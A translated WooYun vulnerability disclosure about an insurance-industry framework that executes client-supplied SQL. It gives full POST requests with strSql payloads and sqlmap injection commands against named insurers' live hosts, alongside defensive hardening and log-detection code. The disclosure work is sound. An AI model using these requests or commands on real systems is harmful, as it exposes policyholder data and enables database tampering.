
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0120530

Title: Design flaw in a system widely used in the insurance industry allows direct database operations to obtain sensitive data (affects numerous life insurers)

Related vendor: CNCERT (National Internet Emergency Center)

Author: 茜茜公主

Submitted: 2015-06-15 10:46

Fixed: 2015-09-17 17:28

Published: 2015-09-17 17:28

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-15: Details sent to the vendor, awaiting vendor handling
2015-06-19: Vendor confirmed; details disclosed to the vendor only
2015-06-22: Details opened to third-party security partners
2015-08-13: Details disclosed to core white hats and domain experts
2015-08-23: Details disclosed to regular white hats
2015-09-02: Details disclosed to intern white hats
2015-09-17: Details disclosed to the public

Brief description:

I know, I need a lightning to upgrade, I need help!

Details:

A while ago I submitted a Huaxia Insurance vulnerability:
WooYun: See how I arbitrarily operated on the database of a Huaxia Life Insurance system from the front end



At the time I did not analyse the packets carefully, so later, while looking for other instances, I was rather discouraged when visiting the affected link redirected straight to the login page.
For example, visiting the ABC Life (农银人寿) vulnerable page http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp redirects to http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp, which misled me into thinking the application had implemented access control.
After repeated testing I found that the request can simply be submitted with POST, after which you can operate on the system's database directly (insert, delete, update, select).

POST http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: remotebak.abchinalife.cn:7060
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie:
strSql=select+*+from+tabs&strStart=1&LargeFlag=0
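The endpoint above takes the SQL text itself from the strSql form field and pages the result with strStart. As an added illustration (not the vendor's EasyQueryXML.jsp code), the following Python models that design against an in-memory SQLite stand-in and, beside it, the shape a fix should take: the client names a server-side query and supplies bound parameters, so no SQL text ever arrives from the browser. The table layout, query names and paging limits are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the policy table seen in the report (LCCONT);
# columns and rows are made up for the example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE LCCONT (ContNo TEXT, AppntName TEXT, Prem REAL)")
    db.executemany("INSERT INTO LCCONT VALUES (?, ?, ?)",
                   [(f"C{i:04d}", f"holder{i}", 100.0 * i) for i in range(1, 26)])
    return db

def easy_query_legacy(db, str_sql, str_start=1, page=10):
    """Model of the reported design: the client supplies the SQL itself, so a
    schema query (select * from tabs in Oracle) enumerates every table and
    any DML the caller sends is executed as well."""
    rows = db.execute(str_sql).fetchall()
    return rows[str_start - 1:str_start - 1 + page]

# Hardened replacement: the client picks a query NAME plus bound parameters;
# the SQL text lives only on the server and paging is done with bound LIMIT/OFFSET.
NAMED_QUERIES = {
    "contract_count": "SELECT COUNT(*) FROM LCCONT",
    "contract_by_no": "SELECT ContNo, AppntName FROM LCCONT WHERE ContNo = ?",
}

def easy_query_hardened(db, query_name, params=(), str_start=1, page=10):
    sql = NAMED_QUERIES.get(query_name)
    if sql is None:                      # unknown name: refuse, never interpolate
        raise PermissionError(f"query not allowed: {query_name!r}")
    if not (1 <= str_start <= 10_000 and 1 <= page <= 100):
        raise ValueError("bad paging values")
    # inner placeholders come first in the text, then the paging pair
    cur = db.execute(f"SELECT * FROM ({sql}) LIMIT ? OFFSET ?",
                     (*params, page, str_start - 1))
    return cur.fetchall()
```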




select count(*) from LCCONT



Proof of vulnerability:

Several other cases

Guohua Life: http://broker.guohualife.com/common/easyQueryVer3/EasyQueryXML.jsp


POST http://broker.guohualife.com/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://broker.guohualife.com/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: broker.guohualife.com
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie:
strSql=select+*+from+tabs&strStart=1&LargeFlag=0




More than 2000 tables...



Pick any table

select count(*) from ATS_REC_TRANSACTIONS




Fetch the first 10 rows



Huaxia Life: http://gdxt.hxlife.com/ui/common/easyQueryVer3/EasyQueryXML.jsp


POST http://gdxt.hxlife.com/ui/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://gdxt.hxlife.com/ui/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: gdxt.hxlife.com
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie:
strSql=select+*+from+tabs&strStart=1&LargeFlag=0




Fetch the first 10 rows:
select * from qlccont where rownum <11



Tian'an Life: http://epos.tianan-life.com/common/easyQueryVer3/EasyQueryXML.jsp


POST http://epos.tianan-life.com/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://epos.tianan-life.com/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: epos.tianan-life.com
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie:
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


select count(*) from SLCCONT



Fetch the first 10 records: select * from SLCCONT where rownum <11



Junlong Life group insurance customer service platform: http://gecss.kdlins.com.cn:8081/gecss/common/easyQueryVer3/EasyQueryXML.jsp


POST http://gecss.kdlins.com.cn:8081/gecss/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://gecss.kdlins.com.cn:8081/gecss/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: gecss.kdlins.com.cn:8081
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie:
LargeFlag=0&strStart=1&strSql=select+*+from+tabs




Junlong Life short-term insurance policy issuing system: http://zhongjie.kdlins.com.cn:8080/kdlins/common/easyQueryVer3/EasyQueryXML.jsp


POST http://zhongjie.kdlins.com.cn:8080/kdlins/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://zhongjie.kdlins.com.cn:8080/kdlins/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: zhongjie.kdlins.com.cn:8080
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie:
strSql=select+*+from+tabs&strStart=1&LargeFlag=0




Jixiang Life: http://epos.jxlife.com.cn/ter/common/easyQueryVer3/EasyQueryXML.jsp


POST http://epos.jxlife.com.cn/ter/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://epos.jxlife.com.cn/ter/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: epos.jxlife.com.cn
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie:
strSql=select+*+from+tabs&strStart=1&LargeFlag=0




select * from SLCPOL where rownum <11



This site framework also has a generic SQL injection, which I am reporting here together with the above (some sites were blocked by a WAF).
The injection point is /common/cvar/CExec.jsp.
When the login page is viewed, the system loads the vulnerable jsp file.
For details see WooYun: An inconspicuous page in an ABC Life system leads to SQL injection

python SQLMap/SQLMap.py -u "http://broker.guohualife.com/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db




python SQLMap/SQLMap.py -u "http://epos.jxlife.com.cn/ter/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db




python SQLMap/SQLMap.py -u "http://remotebak.abchinalife.cn:7060/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db




python SQLMap/SQLMap.py -u "http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db
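For the operations side, here is an added Python example (not from the report) that flags POST requests to the two affected endpoints, EasyQueryXML.jsp and CExec.jsp, in web-server access logs and counts them per source address; matching is on the path suffix because the report shows the framework mounted under different context roots (/ui/, /ter/, /gecss/). The log lines, addresses and timestamps are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample lines in Apache/Tomcat combined log format. The paths are the
# two endpoints named in the report; hosts, addresses and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jun/2015:21:05:06 +0800] "GET /ui/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.0.113.7 - - [14/Jun/2015:21:05:09 +0800] "POST /ui/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1" 200 18342 "http://example.test/ui/indexlis.jsp" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.0.113.7 - - [14/Jun/2015:21:06:11 +0800] "POST /ui/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1" 200 91204 "http://example.test/ui/indexlis.jsp" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)"
198.51.100.4 - - [14/Jun/2015:23:39:28 +0800] "POST /ui/common/cvar/CExec.jsp HTTP/1.1" 500 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.9 - - [14/Jun/2015:23:40:01 +0800] "GET /ui/indexlis.jsp HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Path suffixes of the affected framework endpoints, independent of context root.
WATCHED = ("/common/easyQueryVer3/EasyQueryXML.jsp", "/common/cvar/CExec.jsp")

def flag_requests(log_text):
    """Return (ip, path, status, user-agent) for every POST to a watched endpoint.
    GETs are ignored: the framework answers them with the 302 to the login page
    that the report describes, so they are not the interesting traffic."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                   # skip unparseable lines
        path = m["path"].split("?", 1)[0]              # drop any query string
        if m["method"] == "POST" and path.endswith(WATCHED):
            hits.append((m["ip"], path, m["status"], m["ua"]))
    return hits

def top_sources(hits):
    """Rank source addresses by number of flagged requests."""
    return Counter(ip for ip, *_ in hits).most_common()
```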



Fix:

Consult Sinosoft (中科软)

Copyright notice: please credit the source when reposting: 茜茜公主@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-06-19 17:28

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded by CNCERT to the insurance industry's IT regulatory authority for notification, which will coordinate handling with the website operators. CNVD has also notified the software vendor through its publicly listed contact channels.

Latest status:

None yet